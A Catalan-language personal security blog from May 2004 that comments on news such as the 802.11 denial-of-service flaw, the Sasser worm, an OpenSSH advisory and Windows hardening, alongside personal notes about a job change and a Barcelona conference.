By now you will probably have heard about the alert from AuCert that describes a Denial of Service (DoS) attack on Wi-Fi networks. You might also have heard it's an attack against the protocol and not against a specific implementation. This means it's likely to be difficult to defend yourself simply by applying a patch from your vendor. Addressing this issue will likely require a fair amount of work from ALL the vendors involved; the type of intense collaboration that resulted in 802.11i and it's less beefy, but easier to implement cousin Wi-Fi Protected Access (WPA). We hope you've also heard that an attacker will only be able to attack networks they can reach directly, over the air; an attacker must have control of a machine on or near the wireless network. They can't simply logon to a machine in London and send a specially crafted packet across the Internet to a wireless network in Washington DC; the attack doesn't work that way.
|
20:25 (# Enllaç permanent) ()
|
|
Una nota que he vist, tot just entrar a l'hotel i que m'ha fet feliç:
|
19:31 (# Enllaç permanent) ()
|
|
|
diumenge, 16 / maig / 2004 |
 Demà per a mi és quelcom que gairebé em recorda el primer dia de l'escola... començo a treballar per a una nova empresa. A més, m'han convocat directament a les oficines tècniques de Madrid per un parell de dies, per tal de fer l'aterratge i començar a conèixer la gent, el mètode de treball i tot això... M'hi estaré dilluns i dimarts.
Així doncs que estic nerviós... A més aquesta vegada, en ser el primer viatge a una zona nova (sud de Madrid) i l'estada a un hotel nou, vaig amb la incertesa de quina capacitat de connexió a la xarxa hi haurà disponible. La pàgina web de l'hotel que m'han reservat no dóna masses pistes, de forma que m'imagino que segurament amb prou feines trobaré un connector estàndard RJ-45 RJ-11 pel mòdem i gràcies. Per si de cas fa un moment he creat un parell de comptes gratuïts d'accés a Internet per mòdem... i he instal·lat el mòdem al meu portàtil (no el tenia configurat... ja que fa molt temps que no el faig servir).
Ja veurem com va...
|
18:00 (# Enllaç permanent) ()
|
|
Una web russa, SecurityLab, informa que el codi font del sistema operatiu dels encaminadors i dispositius Cisco, l'IOS 12.x ha estat robat. Segons indiquen, algú ha aconseguit entrar dins de la xarxa de Cisco i robar aquest codi font i, per demostrar-ho, ha publicat una porció del mateix (uns 2,5 MB). El volum total del codi font són 800 MB.
Els usuaris de línies ADSL segurament no podran accedir a aquesta web... encara que configurant un proxy extern si es pot veure. La web està en rus, però es pot arribar fàcilment a dos fitxers d'exemple: ipv6_tcp.c -- IP version 6 support functions for TCP i ipv6_discovery_test.c -- Neighbor Discovery unit tests.
Actualització (16:25)
A Slashdot ja hi ha una discusió sobre que implica això. Per cert, com he vist a un comentari d'Slashdot, l'IOS està farcit d'ordres no documentades... així que la divulgació del codi font permetrà per fi conèixer-les... :-)
|
11:37 (# Enllaç permanent) ()
|
|
|
dissabte, 15 / maig / 2004 |
[News.com] Holy security wars o la inutilitat de la guerra entre els defensors dels IDS (sistemes de detecció d'intrusions) i els IPS (sistemes de prevenció d'intrusions)
|
23:28 (# Enllaç permanent) ()
|
|
[Neowin-Net] Microsoft Outlines Windows Server Roadmap comenta els plans de Microsoft per a futures versions. Els aspectes que he trobat més destacats:
- Microsoft adopta un cicle de versions de quatre anys per a les versions servidor de Windows. Això vol dir que la propera versió (Windows Server Lognhorn) serà el 2007.
- "We'll be seeing Windows Client Longhorn in 2006"
- Microsoft publicarà una actualització de refresc cada dos anys, que inclourà tots els complements, actualitzacions de seguretat i noves funcions.
A l'article també es comenten alguns dels canvis de les properes actualitzacions de Windows Server 2003, el SP1 (major rendiment, estabilitat i totes les actualitzacions de seguretat; canvis incorporats al SP2 de XP, inspecció de clients VPN) així com a l'actualització que es publicarà durant l'any 2005.
|
23:25 (# Enllaç permanent) ()
|
|
El Honeywall CDROM combina totes les eines i requeriments de las passarel·la GenII del projecte Honeynet. És un CD d'inici (un Disco vivo com els anomenava l'Stallman), de forma que només cal arrencar la màquina, fer una mínima configuració en funció del nostre entorn i ja tenim un Honeypot funcionant.
|
23:17 (# Enllaç permanent) ()
|
|
 La configuració per defecte de Windows no és, ni de bon tros, la més adequada. De fàbrica i tot jus, t instal·lar-lo, tenim un gran nombre de serveis de xarxa actius i que, sovint, s'han demostrat força perillosos.
Aquest llibre està pensat per ajudar als administradors de xarxes a configurar Windows d'una forma adequada. Explica quins són els serveis i quina és la seva funció, quan són necessaris i ofereix diverses configuracions estandaritzades on la seguretat és un factor important.
El llibre comença amb la teoria sobre l'enfortiment («Hardening») de la configuració dels sistemes operatius, les eines disponibles a Windows NT referents a la seguretat; la seguretat de Windows 2000 i Windows XP; definició de polítiques de seguretat, la gestió d'actualitzacions, NAQC (Network Access Quarantine Control), l'Internet Information Server, Exchange 2000, auditoria de la seguretat i registre d'activitat.
Títol: Hardening Windows
Autor: Jonathan Hassell
Editorial: apress
1a edició, març 2004
185 pàgines
ISBN 1-59009-266-2
El llibre a Amazon.com i a Amazon.co.uk.
|
20:44 (# Enllaç permanent) ()
|
|
Microsoft ofereix un DVD amb un curs sobre programació segura per als programadors d'aplicacions Windows en plataforma .NET:
Write code and build applications that are less vulnerable to security threats. This “must” DVD seminar introduces developers to the knowledge and skills required to identify and mitigate security threats. The seminar covers the essentials of security as well as best practices for defending your code against threats. It also covers security best practices using the .NET Framework. The information presented is largely relevant to all developers irrespective of programming platform and operating system.
|
19:37 (# Enllaç permanent) ()
|
|
[Cryptonomicon] Bluetooth Hacking for fun and profit
WiFi wardriving tools have now advanced to the point where it is less a sign of techno-machismo and more a sign of social maladjustment to actually go out and wardrive in your neighborhood. So what's a young wireless data enthusiast to do? Software Defined Radio is a good suggestion, but you're limited to the frequencies you can use without relatively expensive equipment. Another recommendation might be investigating the security characteristics of your BlueTooth enabled device.
Bluejacking became a relatively popular sport last year.
|
19:08 (# Enllaç permanent) ()
|
|
Estudiants d'una universitat australiana ha descrit una vulnerabilitat intrínseca al protocol 802.11, utilitzat a les xarxes sense fil, que pot ser utilitzat molt fàcilment per a realitzar un atac de denegació de servei. En la pràctica significa que utilitzant un dispositiu PDA amb capacitat de connexió WiFi es pot pertorbar el senyal emès pels punts d'accés a les xarxes sense fil. Addicionalment, aquesta mena d'atac és difícilment detectable.
Continuació... - També a Hispasec
|
18:59 (# Enllaç permanent) ()
|
|
Uns investigadors de IBM avisen sobre un nou sistema de robar informació... literalment consisteix a escoltar als teclats.
Continuació... - També a Hispasec.
|
18:53 (# Enllaç permanent) ()
|
|
|
divendres, 14 / maig / 2004 |
Packet Sniffer Detection with AntiSniff (PDF)
Packet sniffing is a technique of monitoring every packet that crosses the network. A packet sniffer is a piece of software or hardware that monitors all network traffic. The security threat presented by sniffers is their ability to capture all incoming and outgoing traffic, including clear-text passwords and usernames or other sensitive material. While packet sniffers can be fully passive, some aren’t, therefore they can be detected. This paper discusses the different methods that AntiSniff uses to detect these sniffing programs.
|
17:21 (# Enllaç permanent) ()
|
|
[AusCERT] Denial of Service Vulnerability in IEEE 802.11 Wireless Devices
The Queensland University of Technology has today announced yet another flaw in 802.11 products. AusCERT has the official statement, noting: 'An attacker using a low-powered, portable device such as an electronic PDA and a commonly available wireless networking card may cause significant disruption to all WLAN traffic within range, in a manner that makes identification and localisation of the attacker difficult.' Nice to know that a simple PDA could bring a WiFi network to its knees."
|
17:10 (# Enllaç permanent) ()
|
|
|
dijous, 13 / maig / 2004 |
La Fundació Apache publica dues noves versions (2.0.49 i 1.3.31) del servidor web més utilitzat a Internet. Simultàniament també es publica una nova versió de mod_ssl.
Continuació... - També a Hispasec.com.
|
22:49 (# Enllaç permanent) ()
|
|
Avui he estat a Madrid... per formalitzar la meva sortida (amistosa) de la que fins avui era la meva feina. Dilluns començo a treballar per una altra empresa.
Nota per a la gent «interessada»:
- L'email de la feina, òbviament, ja no és operatiu. Des d'avui mateix ja no hi tinc accés.
- El telèfon mòbil el conservo.
|
22:06 (# Enllaç permanent) ()
|
|
|
dimecres, 12 / maig / 2004 |
Aquesta tarda he anat a la Sessió Plenària de l'Internet Global Conference que s'està celebrant aquesta setmana a Barcelona. Haig de dir que enguany l'IGC ha estat molt millor que en edicions passades, en especial en allò que fa referència els temes que a mi m'interessen. La qualitat dels ponents ha estat molt bona i en cada una de les sessions s'han dit coses prou interessants. Llàstima dels preus... haig de dir que en cas d'haver de passar per caixa, segurament no m'hauria acostat.
La sessió plenària ha estat moderada per Vint Cerf i hi han participat Steven Bellovin d'AT&T, Brian Carpenter d'IBM Suïssa, Steve Crocker del Comitè consultiu de seguretat i estabilitat de la ICANN i Harald Alvestrand de Cisco.
La necessitat d'educar a l'usuari
El primer en intervenir ha estat l'Steven Bellovin que ha parlat de la seva visió sobre l'actualitat de la seguretat a Internet: els nous «bad guys» i les noves amenaces com l'spyware, els atacs a la xarxa (DDoS, suplantació de punts d'accés WiFi...), els phishing attacks (on s'enganya a l'usuari utilitzant tècniques de suplantació, per tal que faciliti informació confidencial). L'Steven ha remarcat la importància que té l'educació de l'usuari per evitar molts d'aquests problemes. A continuació ha parlat dels tallafocs i per quina raó avui ja no són un eina de defensa, sinó un sistema reactiu; la problemàtica dels portàtils i com els atacs de cucs fins i tot afecten als professionals: ha explicat que a l'agost del 2001 l'aparició del Code Red va coincidir amb una reunió de l'IETF; doncs bé, dotzenes de portàtils de la gent que pensa sobre seguretat van ser infectats... :-)
Com a solució, Steven proposa dissenyar els sistemes per estar aïllats i se resistents davant els atacs, aplicant la defensa en profunditat.
DDoS i suplantació
A continuació, Brian Carpenter ha exposat el seu punt de vista. Per ell, l'SPAM no és res més que una lleugera molèstia, fàcilment evitable i que en els propera anys anirà a menys. En canvi els atacs DDoS i de suplantació aniran augmentant.
Per Brian, no hi ha cap excusa que justifiqui l'existència de problemes de seguretat que puguin ser utilitzats pels virus. Això és un exemple de poca atenció a la seguretat i de una baixa qualitat dels productes... Des de 1970 ja es coneix com evitar els problemes de desbordaments de memòria intermèdia.
També ha parlar de privadesa i anonimicitat, que ha explicat que són coses diferents, fent èmfasi en els problemes de pagament totalment anònims: fins a l'actualitat no hi ha cap sistema de pagament per Internet que sigui autènticament anònim.
Ha posat també molt d'èmfasi en la problemàtica de la privadesa i tot allò que poden fer els ISP amb les nostres dades. D'altra banda ha destacat que molts dels problemes de seguretat són originats a la part interna de la xarxa i que la forma de treballar per evitar-los es aplicar polítiques de seguretat a nivell de sistema, d'usuari i dels extrems de les comunicacions. Ha parlat de les possibilitats de seguretat que incorpora IPv6.
Seguretat del DNS
Steven Crocker s'ha centrant en explicar la infraestructura actual del DNS i quines mesures es poden aplicar per a la seva protecció. El DNS és un sistema crític pel funcionament d'Internet, ja que molts serveis necessiten la resolució de noms (i les persones també la necessitem). Per finalitzar, ha explicat l'estat actual dels treballs en DNSSEC.
A continuació ha explicat la seva visió de com lluitar contra els problemes de seguretat. Suggereix que s'apliqui un sistema que permeti identificar l'origen del tràfic d'Internet i com utilitzar això per tal de separar el tràfic procedent de fonts de confiança d'aquelles que no ho són.
Per a Crocker, les fonts de confiança són aquelles xarxes i sistemes que estan ben gestionant, entenent per això els entorns on els sistemes sospitosos es col·loquen en quarantena i s'analitzen les incidències de seguretat --tant les que s'originen als seus equips com a aquelles que es reben de l'exterior.
Ha fet broma sobre el «security flag», una broma de l'Steven Bellovin en un RFC publicat un primer d'abril (dia dels innocents) dient que, possiblement després de tot no era del tot una fantasia.
Per acabar ha explicat com lluitar contra els sistemes zombies: verificacions periòdiques dels canvis i un control estricte de la configuració.
La societat Internet
Per acabar, Harlad Alvestrand ha explicat com Internet està evolucionant per convertir-se en una nova societat, on s'apliquen les seves pròpies regles. Moltes d'aquestes regles són equivalents a les existents a l'actualitat, però d'altres poden ser molt diferents.
|
21:51 (# Enllaç permanent) ()
|
|
blastwave.org is a collective effort to create a set of binary packages of free software, that can be automatically installed to a Solaris computer (sparc or x86 based) over the network.
blastwave.org is inspired by the Debian Linux project.
Blastwave.org és un servidor de «software comunitari» que emula l'apt-get de Debian per a la instal·lació de paquets a Solaris.
Una vegada instal·lat el paquet pkg-get, la instal·lació de qualsevol programa per a Solaris és tan simple com executar# pkg-get install mutt
pkg-get s'encarrega d'instal·lar automàticament totes les dependències necessàries per a poder executar el programa que estem instal·lant. Una consideració a tenir present es que mentre els paquets disponibles a sunfreeware.com tenen com a directori home /usr/local/bin, els paquets de blastwave fan servir com a home /opt/csw/bin.
|
11:05 (# Enllaç permanent) ()
|
|
[Windows devcenter] Understanding NetBIOS and Windows Server 2003. NetBIOS és, des del punt de vista de la seguretat, però encara avui cal conviure amb ell. En aquest article s'explica com fer conviure NetBIOS en un entorn Windows Server 2003 amb consideracions de seguretat i funcionalitat.
Everyone hates NetBIOS, so why is it still around? If you recall, NetBIOS is an ancient (1983) session-level interface and transport protocol developed by Sytec for IBM to network together PCs. It's noisy (broadcast-based), insecure (commands like net view and nbtstat can tell attackers a lot about a NetBIOS network), and scales poorly (its flat namespace was originally designed for LANs with a maximum of 72 hosts).
(...)
you may be tempted to disable NetBIOS on all your machines for greater security. I mean, even if you're already blocking ports 137 (for NetBIOS name resolution), 138 (for NetBIOS browsing and logon), and 139 (for NetBIOS file and print sharing using SMB) on your firewall, you're protecting your network from external attackers trying to exploit NetBIOS to find out information about your network. But this doesn't prevent an insider attack that uses nbtstat to enumerate your network by listing NetBIOS name tables and sessions as a prelude to further penetration.
(...)
Amazingly, NetBIOS is actually still used in the trust creation process -- even though Microsoft has officially "deprecated" NetBIOS in versions of Windows from 2000 on.
|
10:26 (# Enllaç permanent) ()
|
|
[Hispasec] Una actualización de seguridad para Windows XP y 2003 en mayo 2004
En esta ocasión se trata de un parche destinado a solucionar una vulnerabilidad recientemente descubierta que afecta a sistemas Windows XP y 2003 en el Centro de Ayuda y Soporte (Help and Support Center) debido a la forma en que se trata la validación HCP URL.
Un atacante que logre explotar exitosamente esta vulnerabilidad logrará tomar el control completo de los sistemas afectados, incluyendo la instalación de programas; visualizar, cambiar, o eliminar datos; o crear nuevas cuentas de usuario con privilegios de administración.
|
10:16 (# Enllaç permanent) ()
|
|
|
dimarts, 11 / maig / 2004 |
El proper 24 de maig, a les 24 hores, finalitza el termini d'admissió de textos pel I Concurs de relats breus de temàtica hacker escrits en llengua catalana, organitzat pel Servei de Llengües i Terminologia i l'Escola Politècnica Superior de Castelldefels de la Universitat Politècnica de Catalunya.
Els textos tant poden narrar experiències (fites aconseguides, d'intercanvi en xarxa...) com contenir reflexions (patents vs software lliure, l'ètica del hacker...).
Aquest concurs té com a objectiu dignificar la figura del hacker i retornar-li el seu esperit original: el de la persona apassionada per la programació que busca la contínua millora en les xarxes i els sistemes informàtics a partir de la cooperació i la llibertat d'accés al coneixement.
Es valorarà tant el contingut com la redacció del relat. Es concediran tres premis: El primer de 300€, el segon de 150€ i el tercer de 75€.
Hi pot participar qualsevol persona vinculada a la UPC i de qualsevol de les universitats de l'àmbit lingüístic català: alumnes (titulats inclosos) i personal docent i investigador i d'administració i serveis.
El relat s'ha de presentar mitjançant el formulari de participació que hi ha a la web del concurs. El termini d'admissió va començar el passat 23 d'abril, coincidint amb la diada de Sant Jordi, i s'acaba el 23 de maig, a les 24 h.
Més informació a la web del concurs: www2.upc.es/slt/estudiants i a l'adreça electrònica alatac@upc.es.
|
21:06 (# Enllaç permanent) ()
|
|
Avui a l'Internet Global Conference he conegut a Steven Bellovin, amb qui he estat parlant durant una bona estona aprofitant una entrevista que li estava fent la Mercè Molist pel Ciberpaís, el suplement d'Internet del diari «El País».
L'Steven, un de les investigadors amb més anys d'experiència en temes de seguretat i un dels autèntics pioners d'Internet, ha estat en tot moment molt amable. És una persona d'un tracte molt agradable.
Heus aquí el testimoni gràfic:
|
18:14 (# Enllaç permanent) ()
|
|
Us heu adonat que ara la pàgina de resultats de Google ja no mostra enllaços directes a cada una de les pàgines, sinó que s'utilitza un sistema per identificar quina resultat ha escollit l'usuari?
Si abans alhora de fer click al resultat d'una cerca anaves directament a la pàgina que escollies. Ara, en canvi, passes per una pàgina intermèdia de Google.
Això vol dir que ara Google ja no només sap que estem cercant, sinó també que escollim... personalment ho trobo molt perillós.
Actualització
He estat mirant una miqueta més el tema. Només passa quan faig servir l'Internet Explorer. De vegades l'enllaç és tal com he indicat abans: <a href=/url?sa=U&start=2&q=
http://www.quands.info/ ;&e=7620>Quands.info</a>
De vegades, l'enllaç és: <a href = http://www.quands.info/
onmousedown="return clk(1,this)">Quands.info</a>
La funció clk() fa la construcció de la nova URL: function clk(n,el) {
if(document.images){
(new Image()).src=
"/url?sa=T&start="+n+"&url="+escape(el.href);}
return true;
}
En canvi, amb Firefox els enllaços són directes: <a href = http://www.quands.info />Quands.info</a>
|
00:53 (# Enllaç permanent) ()
|
|
|
dilluns, 10 / maig / 2004 |
[SecurityFocus] Automating Windows Patch Management. Tercera (i última part) de la sèrie d'articles publicada per SecurityFocus sobre com automatitzar la gestió dels pegats a les plataformes Windows (2000, XP i 2003).
La primera part tracta sobre SUS, Microsoft Software Update Services per tal d'automatitzar la instal·lació de pegats. La segona part tracta profunditza en conèixer com funciona SUS, com monitoritzar-lo i com solucionar els problemes més habituals. Aquesta tercera part analitza les alternatives existents i es comenten algunes de les novetats de Windows Update que veurem d'aquí a poc temps.
|
22:01 (# Enllaç permanent) ()
|
|
[Security Protocols] Un exploit que permet aprofitar-se de la porta secreta que instal·la Sasser als equips infectats.
|
21:29 (# Enllaç permanent) ()
|
|
El llibre "TCP/IP Illustrated", de Richard Stevens. És un autèntic clàssic i una imprescindible guia de referència pel protocol TCP/IP. Ja fa un temps vaig publicar una breu crítica. Ara el contingut íntegre del llibre està disponible en format PDF. També està disponible en format HTML.
|
21:01 (# Enllaç permanent) ()
|
|
[NYTimes] Illuminating Blacked-Out Words. Uns investigadors europeus han presentat, en el marc d'una conferència que es va fer a Suïssa la setmana passada, un conjunt de tècniques que permeten identificar les paraules o frases censurades dels informes desclassificats.
|
19:29 (# Enllaç permanent) ()
|
|
 Argus vol dir network Audit Record Generation and Utilization System. És una eina que permet la monitorització, en temps real, del tràfic de la xarxa amb finalitats d'auditoria. Argus registra i permet analitzar totes les transaccions TCP/IP que són capturades, enregistrant-la en un format estàndard i permeten aplicar sistemes d'anàlisi i generació d'informes com, per exemple, la connectivitat, ample de banda, pèrdues... Argus funciona en Linux, Solaris, FreeBSD, OpenBSD, NetBSD i Mac OS X. El client, a més, ha estat portat a Cygwin per poder ser utilitzat des de Windows.
|
17:00 (# Enllaç permanent) ()
|
|
[Hack in the box] Better Living Through Mod Security
We’ve all heard of web application level firewalls, and they’re certainly not something new, with several good commercial offerings available for quite some time. Most of these products will offer some kind of web based administration and reporting facilities to allow simple and straight forward management.
On the open source end of the scale we have a project named ModSecurity. According to the Mod Security website (http://www.modsecurity.org), ModSecurity is an open source intrusion detection and prevention engine for web applications. Operating as an Apache Web server module, the purpose of ModSecurity is to increase web application security, protecting web applications from known and unknown attacks.
|
00:00 (# Enllaç permanent) ()
|
|
|
diumenge, 9 / maig / 2004 |
[Physicsweb] Accelerating universe will limit technology. Aquest article escrit per dos físics de la Case Western Reserve University mostra com l'acceleració de l'expansió de l'univers marca un límit físic a la quantitat total d'informació que pot ser emmagatzemada i processada. Segons els autors, la llei de Moore continuarà sent vàlida durant els propers 600 anys i calculen que el nombre màxim de bits que podran ser processats per l'ordinador més potent no podrà passar de l'ordre de 10120.
The acceleration of the expansion of the universe places limits on future developments in technology according to two US cosmologists. Lawrence Krauss and Glenn Starkman of Case Western Reserve University have shown that the acceleration could put a fundamental limit on the total amout of information that can be stored and processed in the future. They also calculate that Moore's Law will remain valid for no more than 600 years -- although workers in the semiconductor industry are more pessimistic and think that the famous law will break down in the next decade or two.
També indiquen d'altres limitacions físiques
The duo calculated that the total number of computer bits that could be processed in the future would be less than 1.35x10120. This means that the effective information available to any observer within the event horizon of an expanding universe will be significantly less than the total so-called Hawking-Beckenstein entropy -- the entropy that is associated with a black hole -- in the universe. Many cosmologists predict that an accelerating universe will ultimately contain nothing but black holes, which will then eventually disappear themselves.
No se pas si estaran encertats o equivocats, però el que si semblen es xalar amb la seva feina:
"It is remarkable that results from cosmology can provide such definite limits on the nature of technology," Krauss told PhysicsWeb. "In addition, it is also remarkable that simple laws of physics put such robust constraints on life, and technology, even when we don't know what that technology will be like."
Pels interessants, l'article de referència complet està també disponible: "Universal Limits on Computation", tant el text complet com un resum.
|
23:53 (# Enllaç permanent) ()
|
|
[Infoworld] Wi-Fi security standard to require new hardware. Aquest article tracta sobre el protocol 802.11i, que segurament serà aprovat per la IEEE aquest juny. Es tracta d'una actualització del protocol 802.11 que modifica el model de seguretat, incorporant les mesures temporals utilitzades fins a la data (com WPA, Wi-Fi Protected Access) i afegeix la utilització de xifrat AES i un mecanismes per a la re-autenticació ràpida dels punts d'accés. Donat els requeriments de càlcul necessari per AES, segurament molts dispositius actuals no tindran capacitat de ser actualitzats a 802.11i.
|
23:39 (# Enllaç permanent) ()
|
|
[Kriptópolis] Matriz de estado de seguridad
¿Es posible caracterizar el nivel de seguridad de un sistema informático? En todo caso, para lograrlo habría que dejar de lado toda subjetividad y basarse fuertemente en herramientas de detección de intrusiones y vulnerabilidades. Este artículo es simplemente una propuesta, que hoy se somete a discusión desde Kriptópolis, y que -como todo trabajo libre presentado en Internet- está abierto a todas las ideas y sugerencias que puedan surgir (que seguramente serán muchas), y que permitan mejorarlo.
|
19:57 (# Enllaç permanent) ()
|
|
[MSNBC] Authorities: Teen confesses to creating 'Sasser'
A German high-school student has confessed to creating the “Sasser” worm that generated chaos across the globe by infecting hundreds of thousands of computers, authorities said Saturday.
(...)
Microsoft said informants contacted it on Wednesday, offering information about the worm’s creator. The company’s investigators worked with German authorities, the FBI and Secret Service agents, tracing the virus by analyzing its source code, said Brad Smith, Microsoft’s top lawyer.
(...)
The teenager told officials that his original intention was to create a virus called “Netsky A” that would combat the “Mydoom” and “Bagle” viruses, removing them from infected computers. In the course of that effort, he developed Sasser.
|
18:43 (# Enllaç permanent) ()
|
|
 Aquest darrer mes i mig he fet una immersió intensiva en el món de Harry Potter. Fins ara no havia llegit cap dels llibres publicats, però fa poques setmanes vaig començar amb el primer títol de la sèrie («Harry Potter i la pedra filosofal») i he continuat amb els altre quatre volums («Harry Potter i la cambra secreta», «Harry Potter i el pres d'Azkaban», «Harry Potter i el calze de foc» i el recentment publicat «Harry Potter i l'ordre del Fènix»).
Haig de dir que m'han agradat força i els he trobat força distrets, especialment els dos últims volums on es presenta un Harry Potter no tan repel·lent com als primers volums, sinó un noi que comet errors i es deixa manar pels seus sentiments, tot i sabent (o intuint) que s'està equivocant.
Així doncs, després d'aquest mes i mig l'únic que puc dir (per que d'aquest llibres ja s'ha dit tot) es que espero impacientment la publicació del sisè volum.
Per cert, una web molt interessant sobre tot el relacionat amb la sèrie de llibres és Harry Potter Facts.
|
00:24 (# Enllaç permanent) ()
|
|
|
dissabte, 8 / maig / 2004 |
[The Register] Sasser ups cost of Windows - Gartner
Gartner is advising its customers to budget for extra security spending on Windows desktops in the wake of the raft of problems caused by the Sasser worm this week.
The influential analyst group reckons the appearance of another - and perhaps even more devastating - worm is only a matter of time. In the meantime, Users should batten down their security hatches.
|
18:20 (# Enllaç permanent) ()
|
|
[Infosec Writers] Risk Assessment on IT infrastructure. La valoració de riscos és el procés d'identificació de les vulnerabilitats i amenaces als recursos d'informació o a la infraestructura informàtica de les organitzacions. Un cop identificats aquests riscos, cal decidir quines contra mesures i accions cal prendre per reduir aquest risc a un nivell acceptable.
|
17:57 (# Enllaç permanent) ()
|
|
|
divendres, 7 / maig / 2004 |
Impressionant fotografia del planeta Saturn presa per l'enginy espacial Cassini. Impressionant l'ombra dels anyells damunt l'atmosfera del planeta. També es veuen alguns puntets lluminosos que corresponent a quatre llunes.
|
23:06 (# Enllaç permanent) ()
|
|
[Slashdot] Microsoft Security Updates for Pirated Windows? es comenta el fet que moltes còpies pirates de Windows XP no poden instal·lar l'actualització de seguretat necessària per evitar el cuc Sasser.
Aparentment si la còpia de Windows XP no disposa d'una clau de registre vàlida no es pot baixar l'actualització, el que no permet una solució fàcil per evitar l'acció del cuc Sasser. Hauria Microsoft de permetre a aquests usuaris instal·lar l'actualització, especialment tenint present l'impacte que té aquest cuc per a la resta d'usuaris d'Internet (inclosos els usuaris legítims de Windows XP).
|
08:00 (# Enllaç permanent) ()
|
|
Quatre interessants presentacions de Microsoft sobre seguretat:
Totes elles en format PPT.
|
07:49 (# Enllaç permanent) ()
|
|
|
dijous, 6 / maig / 2004 |
[News.com] Alarm growing over bot software
While many network administrators worry about the next worm, security experts are warning that a quieter but equally damaging threat is slowly gaining control of large networks of computers.
Per bot s'entén programes instal·lats a les màquines dels usuaris, funcionant en segon terme i que poden ser controlades remotament per un atacant. La seva utilització habitual és robar informació o utilitzar els sistemes infectats com a trampolí per atacar altres sistemes.
|
23:35 (# Enllaç permanent) ()
|
|
[CNet] We are all security customers Article de Bruce Schneier sobre la situació de la seguretat informàtica en el debat polític actual als Estats Units i el seu cost.
As a security professional, I see a vital component missing from the debate. It's important to discuss different security measures, and determine which ones will be most effective. But that's only half of the equation; it's just as important to discuss the costs. Security is always a trade-off, and herein lies the real question: "Is this security countermeasure worth it?"
|
19:14 (# Enllaç permanent) ()
|
|
[Netcraft] Entrevista a Miguel de Icaza
Q. What do you see as the greatest danger to the continuing adoption and progress of open source?
A. Microsoft realises today that Linux is competing for some of the green pastures that it's been enjoying for so long; I think that Longhorn is a big attempt to take back what they owned before. Longhorn has kind of a scary technology called Avalon, which when compounded with another technology called XAML, it's fairly dangerous. And the reason is that they've made it so it's basically an HTML replacement.
|
15:53 (# Enllaç permanent) ()
|
|
|
dimecres, 5 / maig / 2004 |
Recull de fotografies de l'eclipsi de lluna d'ahir publicades per l'Agrupació Astronòmica de Sabadell.
Per cert, anuncien també que el proper 8 de juny es produirà un fenomen excepcional: Venus s'interposarà entre el Sol i la Terra, el que farà aparèixer una taca negra, d'aproximadament un 3% la mida total, passejant-se per la superfície solar. Es un fenomen força excepcional: no passava des de l'any 1882 i el proper no serà fins al 2012 (i després caldrà esperar fins l'any 2117). A més, la interposició serà durant tot el matí i visible des de tot Europa.
Caldrà començar a preparar els vidres fumats...
|
12:29 (# Enllaç permanent) ()
|
|
|
dimarts, 4 / maig / 2004 |
Me'n vaig a Madrid fins divendres. Objectiu: continuar amb el tancament de temes...
|
21:47 (# Enllaç permanent) ()
|
|
Prelude is an open source framework for building distributed Hybrid Intrusion Detection Systems (HIDS). The reason it is called 'Hybrid' is that it utilizes sensors which are network based (NIDS). But also allows for hosts logs to be transmitted to a central 'Manager' for correlation and storage in a database (mySQL, Postgres, Oracle). Prelude has been around in one form or another since 1998, so it is mature in terms of development. As well as equally as old as the Snort Project. With its modular design and ability to allow other external applications/devices to report to it makes it an excellent and extensible solution to creating custom HIDS solutions.
There is are a myriad of terms that have come about recently that apply to variations of an IDS. A newer term that has come about is a SIM (Security Information Management). Which can apply partly to the Prelude framework. Being that a SIM is a centralized repository for security event information. In fact by this definition Prelude is for the most part a SIM: http://www.nwfusion.com/details/814.html.
(...)
An example of some device logs LML understands would be:
(...)
Another plus to the Prelude framework is the ability to patch other applications to report to a Prelude Manager as a sensor. Examples of such applications able to be made 'Prelude Aware' are:
La web de Prelude és http://www.prelude-ids.org/.
|
20:55 (# Enllaç permanent) ()
|
|
[Bink.nu] Microsoft publicarà la nova versió del seu tallafocs (ISA Server 2004, Internet Security and Acceleration) durant aquest mes de maig.
|
18:07 (# Enllaç permanent) ()
|
|
Amb tot el merder de la sortida a borsa de Google (no, no penso pas comprar accions), m'ha sorprès veure que ningú fa aquesta associació d'idees:
- Google té guanys.
- Els guanys de Google provenen gairebé exclusivament de la publicitat.
- La resta d'empreses d'Internet no aconsegueixen sobreviure amb la publicitat.
- La publicitat a Google és diferent (en format) a la dels altres llocs. No veiem animacions flash, banners marejadors plens d'animacions, pàgines emergents, intents de dificultar l'accés a la informació ni res de semblant.
La conclusió és evident: la majoria de la gent que fa publicitat a Internet (des dels portals fins a les empreses de publicitat) no han sabut veure que el seu model no funciona. I el que ha sabut adaptar-se al nou mitjà (Google) es menja el pastís.
|
17:24 (# Enllaç permanent) ()
|
|
Quan encara ens trobem en plena epidèmia, amb l'aparició en les últimes hores d'una quarta variant, podem afirmar que el cuc Sasser ha estat un mal menor. Totes les màquines infectades permetien a un intrús obtenir el control total de les mateixes, des de la possibilitat de robar dades sensibles com documents privats o les claus de la banca electrònica de l'usuari, fins esborrar tot el sistema local i unitats de xarxa.
Continuació...
|
11:56 (# Enllaç permanent) ()
|
|
Fa unes hores apuntava l'existència d'un rumor sobre la publicació d'un important problema de seguretat a OpenSSH. Avui ja hi ha més detalls.
iDefense ha publicat un avís confirmant que està treballant en solucionar un problema de seguretat a OpenSSH que pot permetre a un atacant remot obtenir accés com a root.
La versió actual d'OpenSSH continua sent vulnerable a aquest problema. La única forma d'evitar aquest problema és activar la separació de privilegis al servidor sshd (característica, per cert, no disponible a totes les plataformes). Per fer-ho cal afegir a /etc/ssh/sshd_config:UsePrivilegeSeparation yes
Com indiquen a iDefense, la separació de privilegis pot trencar alguna funcionalitat del servidor ssh... però sempre es més aconsellable evitar una vulnerabilitat que permet accés remot com a root que no pas perdre alguna característica concreta d'OpenSSH.
|
10:17 (# Enllaç permanent) ()
|
|
[fcw.com] Linux has its own security holes
There may be fewer viruses designed to attack the Linux operating system, but experts warn that Linux is no more bulletproof than any other system.
(...)
Computing systems are very similar, whether they're called Linux, [Microsoft Corp.'s] Windows, Unix, [Apple Computer Inc.'s] MacIntosh or even [Microsoft's] PocketPC," he said. "Security from the high perspective isn't very different. People for some reason had had this false sense that [Linux] is different. It isn't different at all."
Current and prospective Linux customers should be just as concerned about security as anyone in the Windows or Unix environment," said Laura DiDio, senior analyst of application infrastructure and software platforms for the Yankee Group.
Virus writers will target Linux when the system gains a high enough profile, Witteveen said. But even now, there are some vicious Linux viruses out in the wilds of cyberspace. "Some of them are even worse than Windows viruses," he said.
(...)
Linux is "on everyone's radar screen," and creators of malicious code are increasingly taking notice.
|
00:21 (# Enllaç permanent) ()
|
|
